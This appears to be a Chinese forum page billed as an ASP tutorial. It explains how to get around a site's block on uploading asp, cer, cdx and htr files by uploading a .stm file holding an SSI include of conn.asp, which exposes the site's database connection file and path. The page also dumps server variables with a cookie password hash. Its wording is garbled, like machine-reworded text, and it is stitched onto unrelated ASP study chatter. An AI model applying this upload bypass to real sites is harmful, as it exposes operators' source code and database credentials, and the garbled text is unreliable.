ASP教程之不同意上传asp,cer,cdx,htr时怎样办
问题是他们究竟是喜欢他们是使用软件时,速度快还是速度慢好.(当然在3秒以内).无论是他们输入资料时,查找资料时,分析资料时.上传<Pstyle="TEXT-INDENT:2em">使用stm来上传,还能实行程序,代码:说保留为stm大概shtml看看,运转以下:
HTTP_ACCEPT:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,application/vnd.ms-powerpoint,application/vnd.ms-excel,application/msword,*/*HTTP_ACCEPT_LANGUAGE:zh-cnHTTP_CONNECTION:Keep-AliveHTTP_HOST:localhostHTTP_USER_AGENT:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0;Maxthon;.NETCLR1.1.4322)HTTP_COOKIE:nbblastactivity=1100263629;bblastvisit=1100264583;bblastactivity=1100265530;bbuserid=1;bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f;ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJHTTP_ACCEPT_ENCODING:gzip,deflate
以后文件称号:F:Web1.stm
<P> Web服务器的称号和版本:Microsoft-IIS/5.0
主机名:localhost
端口:80
客户或客户代办署理IP地点:127.0.0.1
客户或客户代办署理主机名:127.0.0.1
PATH_INFO的值,但带有扩大为某个目次标准的假造路 径:F:Web1.stm
客户端给出附加路径信息:/1.stm
image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,application/vnd.ms-powerpoint,application/vnd.ms-excel,application/msword,*/* QuotedfromUnkown:
<P>
当网站不同意上传aspcercdxhtr等文件时,上传一个stm文件,内容为:<P> <!--#includefile="conn.asp"--><P> 间接哀求这个stm文件,conn.asp就一览无遗,数据库路径也就得手啦。
本来就是如上所说的,<P> <!--#includefile="conn.asp"--><P> 就是一条SSI指令,其感化是将"info.htm"的内容拷贝到以后的页面中,当会见者来扫瞄时,会看到别的HTML文档一样显现info.htm个中的内容。
我在当地实验乐成!在我的iis目次下建了一个test.stm文件,内容为:<P> <!--#includefile="conn.asp"--> 又在统一目次下放了一个我的一个木马文件ok.asp在扫瞄器中哀求test.stm,没有甚么反应,一片空缺。可是一检察源代码,狂晕,本来就是我的asp文件的内容!如许我们就能够使用这个来猎取要进侵的web的conn文件来取得数据库路径,可是一个条件是服务器的对stm大概shtml的扩大没有删除!
ASP一般认为只能运行在IIS上,正如前面所提到的,这并不是十分正确,事实上,ASP也能运行在Apache上。ApacheASP可在任意Apache服务器上运行有限的ASP功能,所需做的,只需打开mod_perl。 我想问如何掌握学习节奏(先学什么再学什么)最好详细点? 运用经典的例子。并且自己可以用他来实现一些简单的系统。如果可以对他进行进一步的修改,找出你觉得可以提高性能的地方,加上自己的设计,那就更上一个层次了,也就会真正地感到有所收获。 跟学别的语言一样,先掌握变量,流程控制语句(就是ifwhileselect)等,函数/过程,数组 ASP(ActiveServerPages)是Microsfot公司1996年11月推出的WEB应用程序开发技术,它既不是一种程序语言,也不是一种开发工具,而是一种技术框架,不须使用微软的产品就能编写它的代码,能产生和执行动态、交互式、高效率的站占服务器的应用程序。 代码逻辑混乱,难于管理:由于ASP是脚本语言混合html编程,所以你很难看清代码的逻辑关系,并且随着程序的复杂性增加,使得代码的管理十分困难,甚至超出一个程序员所能达到的管理能力,从而造成出错或这样那样的问题。 尽管MS自己讲C#内核中更多的象VC,但实际上我还是认为它和Java更象一些吧。首先它是面向对象的编程语言,而不是一种脚本,所以它具有面向对象编程语言的一切特性,比如封装性、继承性、多态性等等,这就解决了刚才谈到的ASP的那些弱点。 虽然ASP也有很多网络教程。但是这些都不系统。都是半路出家,只是从一个例子告诉你怎么用。不会深入讨论,更不会将没有出现在例子里的方法都一一列举出来。
页:
[1]